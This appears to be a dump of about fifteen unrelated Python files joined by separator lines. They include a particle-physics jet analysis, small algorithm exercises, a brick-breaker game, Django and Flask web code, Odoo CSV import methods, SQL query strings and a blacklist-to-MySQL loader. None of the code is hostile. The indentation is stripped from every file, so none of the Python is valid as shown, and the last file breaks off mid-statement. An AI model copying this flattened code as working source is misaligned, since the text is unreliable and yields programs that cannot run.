print()
# set up our jet definition and a jet selector
jet_R04 = 0.4
jet_def_R04 = fj.JetDefinition(fj.antikt_algorithm, jet_R04)
jet_R10 = 1.0
jet_def_R10 = fj.JetDefinition(fj.antikt_algorithm, jet_R10)
# select jets
jet_selector = fj.SelectorPtMin(10.0) & fj.SelectorAbsEtaMax(2.)
# pythia init
mycfg = ['PhaseSpace:pThatMin = 100']
if args.ignore_mycfg:
mycfg = []
pythia = pyconf.create_and_init_pythia_from_args(args, mycfg)
if not pythia:
print("[e] pythia initialization failed.")
return
fout = ROOT.TFile(args.output, 'recreate')
fout.cd()
ptbins = logbins(10, 1000, 25)
irbins = linbins(0, 1, 25)
nsbins = linbins(0, 25, 25)
print(ptbins)
print(irbins)
hERptR04 = ROOT.TH2D('hERptR04', 'hERptR04;p_{T}^{jet} (GeV/c); r', 25, ptbins, 25, irbins)
hERptR10 = ROOT.TH2D('hERptR10', 'hERptR10;p_{T}^{jet} (GeV/c); r', 25, ptbins, 25, irbins)
hR04nsd01pt = ROOT.TH2D('hR04nsd01pt', 'hR04nsd01pt', 25, ptbins, 25, nsbins)
hR04nsd02pt = ROOT.TH2D('hR04nsd02pt', 'hR04nsd02pt', 25, ptbins, 25, nsbins)
hR04nlundpt = ROOT.TH2D('hR04nlundpt', 'hR04nlundpt', 25, ptbins, 25, nsbins)
hR04sd02Rg = ROOT.TH2D('hR04sd02Rg', 'hR04sd02Rg', 25, ptbins, 25, irbins)
hR04sd02Rg_n = ROOT.TH2D('hR04sd02Rg_n', 'hR04sd02Rg_n', 25, ptbins, 25, irbins)
hR10nsd01pt = ROOT.TH2D('hR10nsd01pt', 'hR10nsd01pt', 25, ptbins, 25, nsbins)
hR10nsd02pt = ROOT.TH2D('hR10nsd02pt', 'hR10nsd02pt', 25, ptbins, 25, nsbins)
hR10nlundpt = ROOT.TH2D('hR10nlundpt', 'hR10nlundpt', 25, ptbins, 25, nsbins)
hR10sd02Rg = ROOT.TH2D('hR10sd02Rg', 'hR10sd02Rg', 25, ptbins, 25, irbins)
hR10sd02Rg_n = ROOT.TH2D('hR10sd02Rg_n', 'hR10sd02Rg_n', 25, ptbins, 25, irbins)
# event loop
if args.nev < 10:
args.nev = 100
for i in tqdm.tqdm(range(args.nev)):
if not pythia.next():
continue
attach_pythia_particle_info = args.part_info
parts = pythiafjext.vectorize_select(pythia, [pythiafjext.kFinal], attach_pythia_particle_info)
jets_R04 = jet_selector(jet_def_R04(parts))
jets_R10 = jet_selector(jet_def_R10(parts))
gshops = [fjcontrib.GroomerShop(j, 0.4, fj.cambridge_algorithm) for j in jets_R04]
for ij, jj in enumerate(jets_R04):
for c in jj.constituents():
hERptR04.Fill(jj.perp(), c.delta_R(jj), c.perp())
lund_splits = gshops[ij].lund_splits()
n_SD_01 = len([s.z() for s in lund_splits if s.z() > 0.1])
hR04nsd01pt.Fill(jj.perp(), n_SD_01)
n_SD_02 = len([s.z() for s in lund_splits if s.z() > 0.2])
hR04nsd02pt.Fill(jj.perp(), n_SD_02)
n_splits = len(lund_splits)
hR04nlundpt.Fill(jj.perp(), n_splits)
sd02 = gshops[ij].soft_drop(0.0, 0.2, 1.)
hR04sd02Rg.Fill(jj.perp(), sd02.Delta())
[hR04sd02Rg_n.Fill(jj.perp(), s.Delta()) for s in lund_splits if s.z() > 0.2]
gshops = [fjcontrib.GroomerShop(j, 1.0, fj.cambridge_algorithm) for j in jets_R10]
for ij, jj in enumerate(jets_R10):
for c in jj.constituents():
hERptR10.Fill(jj.perp(), c.delta_R(jj), c.perp())
lund_splits = gshops[ij].lund_splits()
n_SD_01 = len([s.z() for s in lund_splits if s.z() > 0.1])
hR10nsd01pt.Fill(jj.perp(), n_SD_01)
n_SD_02 = len([s.z() for s in lund_splits if s.z() > 0.2])
hR10nsd02pt.Fill(jj.perp(), n_SD_02)
n_splits = len(lund_splits)
hR10nlundpt.Fill(jj.perp(), n_splits)
sd02 = gshops[ij].soft_drop(0.0, 0.2, 1.)
hR10sd02Rg.Fill(jj.perp(), sd02.Delta())
[hR10sd02Rg_n.Fill(jj.perp(), s.Delta()) for s in lund_splits if s.z() > 0.2]
pythia.stat()
fout.cd()
for h in [hERptR04, hERptR10]:
hi = part_int_h2(h)
hi.Write()
for h in [hERptR04, hR04nsd01pt, hR04nsd02pt, hR04nlundpt, hR04sd02Rg, hR04sd02Rg_n]:
tp = h.ProfileX(h.GetName() + '_pfx', 1, -1, 's')
tp.Write()
for h in [hERptR10, hR10nsd01pt, hR10nsd02pt, hR10nlundpt, hR10sd02Rg, hR10sd02Rg_n]:
tp = h.ProfileX(h.GetName() + '_pfx', 1, -1, 's')
tp.Write()
fout.Write()
if __name__ == '__main__':
main()
|
from queue import Queue
# Breadth First Search algortihm for graph in matrix representation
# Time complexity: O(V^2)
# where V - number of vertex
# It could be done in O(V*log(E)) in list representation
def bfs(G, s):
n = len(G)
queue = Queue()
dist = [0]*n
parent = [-1]*n
visited = [False]*n
queue.put(s)
while not queue.empty():
u = queue.get()
for v in range(n):
if not visited[v] and G[u][v] != -1:
dist[v] = dist[u]+1
parent[v] = u
queue.put(v)
visited[u] = True
print(dist)
if __name__ == '__main__':
G = [
[-1, 1, 1, 1, -1],
[1, -1, -1, -1, -1],
[1, -1, -1, -1, 1],
[1, -1, -1, -1, 1],
[-1, -1, 1, 1, -1],
]
bfs(G, 1)
|
#!/usr/bin/python3
"""Module with BaseGeometry class"""
BaseGeometry = __import__('7-base_geometry').BaseGeometry
class Rectangle(BaseGeometry):
""""Representation of a rectangule"""
def __init__(self, width, height):
"""Instantiation of a rectangle"""
self.integer_validator("width", width)
self.__width = width
self.integer_validator("height", height)
self.__height = height
|
n = int(input())
row = list()
temp = True
for i in range(n):
row.append(input())
if 'OO' in row[i] and temp:
row[i] = row[i].replace('OO', '++', 1)
temp = False
if temp:
print('NO')
else:
print('YES')
print(*[i for i in row], sep='\n')
|
from pico2d import *
import random
import game_framework
import game_world
import ui
import json
from player import Player
from ball import Ball
from background import Background
from highscore import Highscore
from wall import Wall
from brick import Brick
GAMESTATE_READY, GAMESTATE_INPLAY, GAMESTATE_PAUSED, GAMESTETE_GAMEOVER = range(4)
BULLETS_AT_START = 10
class Life:
red = None
white = None
LIFE_AT_START = 5
def __init__(self):
pass
# if Life.red == None:
# Life.white = load_image('heart_white.png')
# Life.red = load_image('heart_red.png')
def draw(self, life):
pass
# x, y = get_canvas_width() - 50, get_canvas_height() - 50
# for i in range(Life.LIFE_AT_START):
# heart = Life.red if i < life else Life.white
# heart.draw(x, y)
# x -= 50
player = None
ball = None
wall = None
# bricks
life = None
scoreLabel = None
highscore = None
gameOverImage = None
music_bg = None
wav_bomb = None
wav_item = None
gameState = GAMESTATE_READY
stage = None
def enter():
global player, life, scoreStatic, scoreLabel
bg = Background()
game_world.add_object(bg, game_world.layer_bg)
player = Player()
game_world.add_object(player, game_world.layer_player)
life = Life()
global ball
ball = Ball(400, 400, 1, 1)
game_world.add_object(ball, game_world.layer_player)
global wall
wall = Wall()
game_world.add_object(wall, game_world.layer_bg)
bg.target = player
global stage_number
stage_number = 1
cw = get_canvas_width()
ch = get_canvas_height()
label = ui.Label("Score:", cw - 200, ch - 55, 36, ui.FONT_2)
label.color = (255, 191, 127)
ui.labels.append(label)
scoreStatic = label
label = ui.Label("0", cw - 200, ch - 100, 36, ui.FONT_2)
label.color = (255, 191, 127)
ui.labels.append(label)
scoreLabel = label
global highscore
highscore = Highscore()
global music_bg, wav_bomb, wav_item
# music_bg = load_music('background.mp3')
# wav_bomb = load_wav('explosion.wav')
# wav_item = load_wav('item.wav')
game_world.isPaused = isPaused
ready_game()
global gameOverImage
# gameOverImage = load_image('game_over.png')
def start_game():
global gameState
gameState = GAMESTATE_INPLAY
global music_bg
# music_bg.set_volume(64)
# music_bg.repeat_play()
def goto_next_stage():
global stage_number
stage_number += 1
ready_game()
def ready_game():
global gameState
gameState = GAMESTATE_READY
game_world.remove_objects_at_layer(game_world.layer_obstacle)
game_world.remove_objects_at_layer(game_world.layer_item)
f = open('stage_' + str(stage_number) + '.json', 'r')
data = json.load(f)
f.close()
global stage
stage = data
wall.bg_index = data['bg_pattern']
bricks = data['bricks']
global ball
ball.x, ball.y, ball.angle, ball.speed = tuple(data['ball'])
for d in bricks:
brick = Brick(d["x"], d["y"], d["t"])
game_world.add_object(brick, game_world.layer_obstacle)
global scoreStatic, scoreLabel
if 'label_s1' in data:
scoreStatic.color = tuple(data['label_s1'])
if 'label_s2' in data:
scoreLabel.color = tuple(data['label_s2'])
# player.init(Life.LIFE_AT_START)
update_score()
def end_game():
global gameState, player, highscore
gameState = GAMESTETE_GAMEOVER
highscore.add(Highscore.Entry(player.score))
global music_bg
music_bg.stop()
def isPaused():
global gameState
return gameState != GAMESTATE_INPLAY
def createMissle():
m = Missile(*gen_random(), random.randint(20, 60))
game_world.add_object(m, game_world.layer_obstacle)
def collides_distance(a, b):
dx, dy = a.x - b.x, a.y - b.y
sq_dist = dx ** 2 + dy ** 2
radius_sum = a.size / 2 + b.size / 2
return sq_dist < radius_sum ** 2
def gen_random():
global player
field_width = get_canvas_width()
field_height = get_canvas_height()
dx, dy = random.random(), random.random()
if (dx < 0.5): dx -= 1
if (dy < 0.5): dy -= 1
side = random.randint(1, 4) # 1=top, 2=left, 3=bottom, 4=right
if (side == 1): # top
x, y = random.randint(0, field_width), 0
if (dy < 0): dy = -dy
if (side == 2): # left
x, y = 0, random.randint(0, field_height)
if (dx < 0): dx = -dx
if (side == 3): # bottom
x, y = random.randint(0, field_width), field_height
if (dy > 0): dy = -dy
if (side == 4): # right
x, y = field_width, random.randint(0, field_height)
if (dx > 0): dx = -dx
speed = 1 + player.score / 60
dx, dy = dx * speed, dy * speed
return x, y, dx, dy
def draw():
clear_canvas()
game_world.draw()
ui.draw()
global player
life.draw(player.life)
global wall
wall.drawRight()
# global gameState, gameOverImage
# if gameState == GAMESTETE_GAMEOVER:
# gameOverImage.draw(get_canvas_width() / 2, get_canvas_height() / 2)
# highscore.draw()
update_canvas()
def update():
global player, gameState, wav_bomb, wav_item
if gameState != GAMESTATE_INPLAY:
delay(0.01)
return
ui.update()
game_world.update()
global wall, ball
wall.didBounce(ball)
player.didBounce(ball)
global stage, stage_number
for b in game_world.objects_at_layer(game_world.layer_obstacle):
if b.didBounce(ball):
if stage != None and 'scores' in stage:
score = stage['scores'][b.type]
# print(b.type, score)
else:
score = b.score
if b.life == 0:
player.score += score
update_score()
count = game_world.count_at_layer(game_world.layer_obstacle)
if count == 0:
goto_next_stage()
break
delay(0.01)
# print()
def update_score():
global player, scoreLabel
str = "{:5.0f}".format(player.score)
scoreLabel.text = str
def toggle_paused():
global player, gameState
if gameState == GAMESTETE_GAMEOVER:
ready_game()
elif gameState == GAMESTATE_INPLAY:
gameState = GAMESTATE_PAUSED
player.score -= 2.0
if player.score < 0:
player.score = 0
update_score()
else:
gameState = GAMESTATE_INPLAY
def handle_events():
global player, gameState, ball
events = get_events()
for e in events:
if e.type == SDL_QUIT:
game_framework.quit()
elif (e.type, e.key) == (SDL_KEYDOWN, SDLK_ESCAPE):
game_framework.pop_state()
elif (e.type, e.key) == (SDL_KEYDOWN, SDLK_SPACE):
toggle_paused()
elif (e.type, e.key) == (SDL_KEYDOWN, SDLK_q):
ball.speed *= 2
elif (e.type, e.key) == (SDL_KEYDOWN, SDLK_e):
ball.speed /= 2
elif e.type == SDL_MOUSEBUTTONDOWN:
if player.mouse_control:
toggle_paused()
return
handled = player.handle_event(e)
if handled:
if gameState == GAMESTATE_READY:
start_game()
elif gameState == GAMESTATE_PAUSED:
gameState = GAMESTATE_INPLAY
ui.handle_event(e)
def exit():
game_world.clear()
global music_bg, wav_bomb, wav_item
# del(music_bg)
# del(wav_bomb)
# del(wav_item)
global life, highscore
del(life)
del(highscore)
if __name__ == '__main__':
import sys
current_module = sys.modules[__name__]
open_canvas()
game_framework.run(current_module)
close_canvas()
|
from django.urls import path
from .views import RoomView,CreateRoomView,getRoom,JoinRoom,UserInRoom,LeaveRoom,UpdateView
urlpatterns = [
path('room',RoomView.as_view()),
path('create-room',CreateRoomView.as_view()),
path('get-room',getRoom.as_view()),
path('join-room',JoinRoom.as_view()),
path('checkRoom',UserInRoom.as_view()),
path('leaveroom',LeaveRoom.as_view()),
path('updateroom',UpdateView.as_view())
]
|
import os,sys
import glob
import pickle
import numpy as np
# Name: decompress(BLOCKSIZE, ORGANIZED_EDGES, bit_list)
# Description: takes block data from files and puts them individually in L_check
# Parameter: BLOCKSIZE = contains number of spanning trees per block
# ORGANIZED_EDGES = contains mapping of boolean to edges
# Output: None
def decompress(BLOCKSIZE, ORGANIZED_EDGES):
fileName = "blockfiles/block-?*"
fileNum = len(glob.glob(fileName)) #count how many blocks there are
spanningLength = len(ORGANIZED_EDGES)
#run thru each block
for block in range(fileNum):
fileName = "blockfiles/block-%d" % block
array_data = load(fileName)
data = np.unpackbits(array_data, axis=1)
L_check = []
for row in range(BLOCKSIZE):
if(len(L_check) > 0):
print "Spanning Tree =", L_check #prints each spanning tree
L_check = []
for column in range(spanningLength):
if(data[row][column] == 1):
L_check.append(ORGANIZED_EDGES[column])
# Name: load(filename)
# Description: Does a pickle load from file 'filename' and returns it
# Parameter: filename = name of file to perform pickle load on
# Output: data = object to store file contents
def load(filename):
fileObject = open(filename,'rb+')
data = pickle.load(fileObject)
fileObject.close()
return data
|
# Author: Christian Brodbeck <christianbrodbeck@nyu.edu>
"""Objects for managing files"""
from ._experiment import TreeModel, FileTree
from ._mne_experiment import MneExperiment
|
# -*- encoding: utf-8 -*-
###############################################################################
# #
# product_brand for Odoo #
# Copyright (C) 2009 NetAndCo (<http://www.netandco.net>). #
# Copyright (C) 2011 Akretion Benoît Guillot <benoit.guillot@akretion.com> #
# Copyright (C) 2014 prisnet.ch Seraphine Lantible <s.lantible@gmail.com> #
# Copyright (C) 2015 Leonardo Donelli #
# Contributors #
# Mathieu Lemercier, mathieu@netandco.net #
# Franck Bret, franck@netandco.net #
# Seraphine Lantible, s.lantible@gmail.com, http://www.prisnet.ch #
# Leonardo Donelli, donelli@webmonks.it, http://www.wearemonk.com #
# #
# This program is free software: you can redistribute it and/or modify #
# it under the terms of the GNU Affero General Public License as #
# published by the Free Software Foundation, either version 3 of the #
# License, or (at your option) any later version. #
# #
# This program is distributed in the hope that it will be useful, #
# but WITHOUT ANY WARRANTY; without even the implied warranty of #
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the #
# GNU Affero General Public License for more details. #
# #
# You should have received a copy of the GNU Affero General Public License #
# along with this program. If not, see <http://www.gnu.org/licenses/>. #
# #
###############################################################################
###############################################################################
# Product Brand is an Openobject module wich enable Brand management for #
# products #
###############################################################################
from openerp.osv import osv, fields
import csv
import pdb
class res_partner(osv.Model):
_inherit = 'res.partner'
_columns = {
'pyme_id': fields.integer('pyme_id'),
}
def update_pyme_id(self, cr, uid, ids, context=None):
# pdb.set_trace()
reader = csv.reader(open('/opt/odoo/odoo-rd/fondeur_updates/suplidor.csv', 'rb'))
res_partner_obj = self.pool.get('res.partner')
for data in reader:
name = data[3]
id = data[0]
res_partner = res_partner_obj.search(cr, uid, [('name', '=', name), ('supplier', '=', True)])
res_partners = res_partner_obj.browse(cr, uid, res_partner, context=context)
for item in res_partners:
if name == item.name:
res_partner_obj.write(cr, uid, item.id, {'pyme_id': id})
class product_product(osv.Model):
_inherit = 'product.product'
_columns = {
'pyme_id': fields.text('pyme_id'),
}
def update_pyme_id(self, cr, uid, ids, context=None):
#pdb.set_trace()
csvf = csv.reader(open('/opt/odoo/odoo-rd/fondeur_updates/producto.csv', 'rb'))
product_product_obj = self.pool.get('product.product')
product_template_obj = self.pool.get('product.template')
for data in csvf:
id = data[0]
product_product = product_product_obj.search(cr, uid, [('default_code', '=', id)])
product_products = product_product_obj.browse(cr, uid, product_product, context=context)
for item in product_products:
if id == item.default_code:
product_product_obj.write(cr, uid, item.id, {'pyme_id': id})
product_template = product_template_obj.search(cr, uid, [('id', '=', item.product_tmpl_id.id)])
product_templates = product_template_obj.browse(cr, uid, product_template, context=context)
product_template_obj.write(cr, uid, product_templates.id, {'pyme_id': id})
class product_template(osv.Model):
_inherit = 'product.template'
_columns = {
'pyme_id': fields.text('pyme_id'),
}
def update_pyme_id(self, cr, uid, ids, context=None):
# pdb.set_trace()
csvf = csv.reader(open('/opt/odoo/odoo-rd/fondeur_updates/producto.csv', 'rb'))
product_product_obj = self.pool.get('product.product')
product_template_obj = self.pool.get('product.template')
for data in csvf:
id = data[0]
product_product = product_product_obj.search(cr, uid, [('default_code', '=', id)])
product_products = product_product_obj.browse(cr, uid, product_product, context=context)
for item in product_products:
if id == item.default_code:
product_product_obj.write(cr, uid, item.id, {'pyme_id': id})
product_template = product_template_obj.search(cr, uid, [('id', '=', item.product_tmpl_id.id)])
product_templates = product_template_obj.browse(cr, uid, product_template, context=context)
product_template_obj.write(cr, uid, product_templates.id, {'pyme_id': id})
class product_supplierinfo(osv.Model):
_name = 'update.product.supplierinfo'
def update_product_supplierinfo(self, cr, uid, ids, context=None):
pdb.set_trace()
csvf = csv.reader(open('/opt/odoo/odoo-rd/fondeur_updates/IvProductosSuplidor.csv', 'rb'))
res_partner_obj = self.pool.get('res.partner')
product_template_obj = self.pool.get('product.template')
product_supplierinfo_obj = self.pool.get('product.supplierinfo')
counter = 0
for data in csvf:
ProductoID = data[0]
ConfigID = data[1]
TallaID = data[2]
ColorID = data[3]
SuplidorID = data[4]
CodigoExterno = data[5]
DescripcionExterna = data[6]
if CodigoExterno == 'NULL':
CodigoExterno == False
product_template = product_template_obj.search(cr, uid, [('pyme_id', '=', ProductoID)])
product_template_record = product_template_obj.browse(cr, uid, product_template)
res_partner = res_partner_obj.search(cr, uid, [('pyme_id', '=', SuplidorID),('supplier', '=', True)])
res_partner_record = res_partner_obj.browse(cr, uid, res_partner)
# if not product_template_record and res_partner_record:
# print "No hay registro coincidente para un producto ni su suplidor"
for rec in product_template_record:
if product_template_record and res_partner_record:
vals = {
'product_tmpl_id': rec.id,
'name': res_partner_record.id,
'sequence': 1,
'product_name': DescripcionExterna or False,
'product_code': CodigoExterno or False,
'qty': 0.00,
'min_qty': 0.00,
'delay': 1,
'product_uom': rec.uom_id.id or False,
}
product_supplierinfo_obj.create(cr, uid, vals)
counter += 1
print "Se ha creado un registro"
print counter
|
#2from django.http import Http404
from django.shortcuts import render,get_object_or_404
from .models import Album,Song
def index(request):
all_albums = Album.objects.all()
#1template= loader.get_template('music/index.html')
context ={
'all_albums': all_albums,
}
#1return HttpResponse(template.render(context,request))
return render(request,'music/index.html',context)
def detail(request,music_id):
#1return HttpResponse("<h1> Welcome in id:"+str(music_id)+"</h1>")
#2try:
#2m1=Album.objects.get(pk=music_id)
#2except Album.DoesNotExist:
#2raise Http404("BC Spotify nai hai jo har gaana milega")
m1=get_object_or_404(Album,pk=music_id)
return render(request,'music/index.html',{'m1':m1})
def favorite(request, music_id):
m1=get_object_or_404(Album,pk=music_id)
try:
selected_song=m1.song_set.get(pk=request.POST['song'])
except(KeyError,Song.DoesNotExist):
return render( request,'music/index1.html',{'m1':m1,'error_message':"you did not select song"})
else:
selected_song.is_favorite=True
selected_song.save()
return render( request,'music/index1.html',{'m1':m1})
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__version__ = '1.0.1'
get_notification_list_query = """
SELECT
nt.id AS id,
nt.name AS name,
nt.description AS description,
nt.notification_type_id AS notification_type_id,
nty.name AS notification_type,
nt.read AS read,
nt.active AS active,
nt.deleted AS deleted
FROM public.notification AS nt
LEFT OUTER JOIN public.notification_type AS nty ON nty.id = nt.notification_type_id
WHERE nt.deleted is FALSE
AND nt.active is TRUE
AND (
$1::VARCHAR is NULL OR
nt.name ILIKE $1::VARCHAR || '%' OR
nt.name ILIKE '%' || $1::VARCHAR || '%' OR
nt.name ILIKE $1::VARCHAR || '%')
"""
get_notification_list_count_query = """
SELECT count(*) AS notification_count
FROM public.notification AS nt
LEFT OUTER JOIN public.notification_type AS nty ON nty.id = nt.notification_type_id
WHERE nt.deleted is FALSE
AND nt.active is TRUE
AND (
$1::VARCHAR is NULL OR
nt.name ILIKE $1::VARCHAR || '%' OR
nt.name ILIKE '%' || $1::VARCHAR || '%' OR
nt.name ILIKE $1::VARCHAR || '%')
"""
get_notification_list_unread_count_query = """
SELECT count(*) AS notification_count
FROM public.notification AS nt
LEFT OUTER JOIN public.notification_type AS nty ON nty.id = nt.notification_type_id
WHERE nt.deleted is FALSE
AND nt.active is TRUE
AND nt.read is FALSE
"""
get_notification_element_query = """
SELECT
nt.id AS id,
nt.name AS name,
nt.description AS description,
nt.notification_type_id AS notification_type_id,
nty.name AS notification_type,
nt.read AS read,
nt.active AS active,
nt.deleted AS deleted
FROM public.notification AS nt
LEFT OUTER JOIN public.notification_type AS nty ON nty.id = nt.notification_type_id
WHERE nt.deleted is FALSE
AND nt.active is TRUE
AND nt.id = $1::BIGINT
"""
|
import json
from flask import Flask, render_template, send_from_directory, request
import os
from flask_cors import CORS
import episodes_crawler
from utils import requests_util
app = Flask(__name__)
CORS(app)
video_root_dir = 'D:/videos/'
@app.route('/', methods=['GET', 'POST'])
def hello_world():
return render_template('index.html')
@app.route("/download/<dir>/<filename>")
def download_file(dir, filename):
directory = os.path.abspath(video_root_dir + dir + '/')
return send_from_directory(directory, filename, as_attachment=True)
@app.route("/find_all_videos", methods=['GET', 'POST'])
def find_m3u8_url():
url = request.form.get('url')
result_arr = episodes_crawler.main(url, 1)
return json.dumps(result_arr)
if __name__ == '__main__':
app.run()
|
from .raspberry import Pins, RaspberryPi
from .utilities import Utilities
__all__ = (
"Pins",
"RaspberryPi",
"Utilities",
)
|
# -*- coding: utf-8 -*-
__author__ = 'yesdauren'
import urllib.request
import re
from shutil import copyfile
import time
import datetime
from datetime import date
from datetime import datetime
import os.path
import zipfile
import xlrd
from xlrd import open_workbook
import sys
import io
import csv
import logging
from sys import argv
# from parsers import settings
dir_path = os.path.dirname(os.path.realpath(__file__))
# create logger
logging.basicConfig(format='%(levelname)s \t %(asctime)s \t %(module)s \t %(message)s', level=logging.INFO,
filename=dir_path + "/logs/load_list.log")
#
host = argv[1]
username = argv[2]
password = argv[3]
database = argv[4]
if password == 'nopass':
password = ''
import pymysql.cursors
connection = pymysql.connect(host=host,
user=username,
password=password,
db=database,
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor,
local_infile=True)
def prepare_string(col):
if col is None:
return ''
return col.replace('\\', "\\\\").strip().strip('\n\r').replace('\n', '').replace('\r', '')
def from_excel_to_txt(filename):
if ".xls" not in filename[-5:]:
return 0
wb = open_workbook(filename)
f = io.open(filename.replace(".xls", ".txt"), 'w', encoding='utf8')
for s in wb.sheets():
ok = False
for row in range(s.nrows):
values = []
for col in range(s.ncols):
value = s.cell(row, col).value
if type(value) is int or type(value) is float:
values.append(str(value))
else:
value = value.strip().strip('\n\r\t').replace('\t', '').replace('\n', '').replace('\r', '')
values.append(value)
if ok and len(values[0]) > 0:
f.write('\t'.join(values) + '\n\r')
if row == 3:
ok = True
f.close()
def download_file():
if not os.path.exists('interprises_parsers/parsers/terror_entity/files/stat.gov.kz/'):
os.makedirs('interprises_parsers/parsers/terror_entity/files/stat.gov.kz/')
file_url = 'http://kfm.gov.kz/blacklist/export/active/xls'
print("start to download file %s" % file_url)
temp_filename, headers = urllib.request.urlretrieve(file_url)
filename = 'list-active20180425.xls'
local_filename = 'interprises_parsers/parsers/terror_entity/files/stat.gov.kz/' + filename
filename, file_extension = os.path.splitext(local_filename)
if file_extension in ['.zip', '.xls', '.xlsx']:
if not os.path.isfile(local_filename):
copyfile(temp_filename, local_filename)
print("copy file %s" % local_filename)
else:
print("%s file from %s is already here" % (local_filename, file_url))
os.remove(local_filename)
copyfile(temp_filename, local_filename)
print("copy file %s" % local_filename)
else:
print("%s file from %s unexpected extension" % (local_filename, file_url))
def convertFile():
terror_entity_folder = 'interprises_parsers/parsers/terror_entity/'
for filename in os.listdir(terror_entity_folder + 'files/stat.gov.kz'):
txt_name = terror_entity_folder + 'files/stat.gov.kz/' + filename.replace(".xlsx", ".txt").replace(".xls", ".txt")
if not os.path.isfile(txt_name):
from_excel_to_txt(terror_entity_folder + 'files/stat.gov.kz/' + filename)
print(filename + " was converted to txt")
logging.debug(filename + " was converted to txt")
terror_ids = []
with open('interprises_parsers/parsers/terror_entity/files/terror_entity.csv', 'w', encoding='UTF-8') as csvfile:
fieldnames = [
'number',
'name',
'birthday',
'iin',
'notes',
'notes_fix',
]
writer = csv.DictWriter(csvfile, fieldnames=fieldnames, delimiter='\t', quotechar='"', escapechar='\\',
quoting=csv.QUOTE_NONNUMERIC, lineterminator='\n')
writer.writeheader()
for filename in os.listdir(terror_entity_folder + 'files/stat.gov.kz/'):
if ".txt" not in filename[-4:]:
continue
k = 0
with io.open(terror_entity_folder + 'files/stat.gov.kz/' + filename, 'r', encoding='UTF-8') as f:
for line in f:
v = line.split('\t')
values = []
for p in v:
values.append(prepare_string(p))
if(len(values) >= 8):
number = values[0]
if len(number) == 0:
number = None
name = values[1] + " " + values[2] + " " + values[3]
if len(name) == 0:
name = None
birthday = values[4]
if len(birthday) == 0:
birthday = None
iin = values[5]
if len(iin) == 0:
iin = None
notes = values[6]
if len(notes) == 0:
notes = None
notes_fix = values[7]
if len(notes_fix) == 0:
notes_fix = None
terror_ids.append((number))
writer.writerow({
'number': number,
'name': name,
'birthday': birthday,
'iin': iin,
'notes': notes,
'notes_fix': notes_fix
})
k = k + 1
copyfile(terror_entity_folder + 'files/' + "terror_entity.csv", "interprises_parsers/tmp/terror_entity.csv")
logging.info('files/' + "terror_entity.csv" + " was copied to interprises_parsers/tmp/ folder")
print('files/' + "terror_entity.csv" + " was copied to interprises_parsers/tmp/ folder")
def import_to_db():
try:
with connection.cursor() as cursor:
sqlfile = dir_path + "/import.sql"
for line in open(sqlfile, encoding='UTF-8'):
if len(line) == 0:
continue
cursor.execute(line)
result = cursor.fetchone()
connection.commit()
print("terror entites were imported to db")
except Exception as e:
print("import to db error: %s" % str(e))
finally:
connection.close()
download_file()
convertFile()
import_to_db()
|
from helpers.case.simcms.base_page import BasePage, BaseTabFields
from helpers.case.simcms.base_data import cms_page
from helpers.director.shortcut import director, ModelFields
import json
from . cms_pages import page1
class Home(BasePage):
def getTemplate(self):
return 'expo_cms/home.html'
def get_heads(self):
return [
{'name': 'hello', 'label': '汉化','editor': 'linetext',},
{'name': 'danyuan', 'label': '但愿','editor': 'linetext',}
]
def mergeCtx(self, par, ctx):
ctx['menu_lianjie'] = json.loads(ctx.get('menu_lianjie','[]'))
out = dict(par)
out.update(ctx)
if not ctx['menu_lianjie'] and par.get('menu_lianjie'):
out['menu_lianjie'] = par.get('menu_lianjie')
return out
def get_tabs(self):
baseinfo = BaseInfo(crt_user = self.request.user)
base2 = BaseInfo2(crt_user = self.request.user)
ls = [
{'name':'baseinfo',
'label':'基本信息',
'com':'com_tab_fields',
'get_data':{
'fun':'get_row',
'kws':{
'director_name':BaseInfo.get_director_name(),
'relat_field':'pk',
}
},
'after_save':{
#'fun':'update_or_insert'
#'fun':'do_nothing'
'fun':'update_par_row_from_db'
},
'heads': baseinfo.get_heads(),
'ops': baseinfo.get_operations()
},
#{'name':'baseinfo2',
#'label':'基本信息2',
#'com':'com_tab_fields',
#'get_data':{
#'fun':'get_row',
#'kws':{
#'director_name':base2.get_director_name(),
#'relat_field':'pk',
#}
#},
#'after_save':{
#'fun':'update_par_row_from_db'
#},
#'heads': base2.get_heads(),
#'ops': base2.get_operations()
#},
]
return ls
class BaseInfo(BaseTabFields):
def get_heads(self):
return [
{'name': 'slogan', 'label': '推广口号','editor': 'blocktext','style': 'width:30em;height:8em',},
{'name':'menu_lianjie','label':'导航栏链接','editor':'com-field-table-list',
'table_heads':[{'name':'url','label':'url','editor':'com-table-pop-fields-local'},
{'name':'label','label':'显示文字'},
{'name': 'op', 'label': '', 'editor': 'com-table-change-order',}],
'fields_heads':[{'name':'url','label':'url','editor':'linetext'},
{'name':'label','label':'显示文字','editor':'linetext'}]
}
]
#def get_heads(self):
#return [
#{'name': 'slogan', 'label': '推广口号','editor': 'blocktext','style': 'width:30em;height:8em',},
#{'name': 'danyuan', 'label': '但愿','editor': 'linetext',},
#{'name':'pp','label':'测试标签','editor':'com-field-table-list',
#'table_heads':[{'name':'a','label':'显示一','editor':'com-table-pop-fields-local'},
#{'name':'b','label':'显示二'},
#{'name': 'op', 'label': '', 'editor': 'com-table-change-order',}],
#'fields_heads':[{'name':'a','label':'显示一','editor':'linetext'},
#{'name':'b','label':'显示二','editor':'linetext'}]
#}
#]
class BaseInfo2(BaseTabFields):
def get_heads(self):
return [
{'name': 'bige', 'label': '逼格','editor': 'linetext',},
{'name': 'danyuan', 'label': '但愿','editor': 'linetext',}
]
director.update({
'simcms.page.home': Home,
'simcms.page.home.base': BaseInfo,
'simcms.page.home.base2': BaseInfo2,
})
cms_page.update({
'expo_cms_home': Home,
})
|
import json
from aiohttp import ClientSession
class PhotoUploader:
@staticmethod
async def get_server(api, peer_id: int) -> str:
server_data = await api.photos.get_messages_upload_server(peer_id=peer_id)
return server_data.response.upload_url
@staticmethod
async def request_text(method: str, url: str, data=None) -> str:
data = data or {}
async with ClientSession().request(method, url, data=data) as resp:
return await resp.text()
async def upload(
self,
api,
upload_url: str,
file_data,
file_name=None,
file_extension=None,
):
file_name = file_name or "Photo"
file_extension = file_extension or "jpg"
if not hasattr(file_data, "name"):
try:
setattr(file_data, "name", f"{file_name}.{file_extension}")
except AttributeError:
raise RuntimeError(
"'bytes' object has no attribute 'name', put your bytes in BytesIO"
)
upload_data = json.loads(
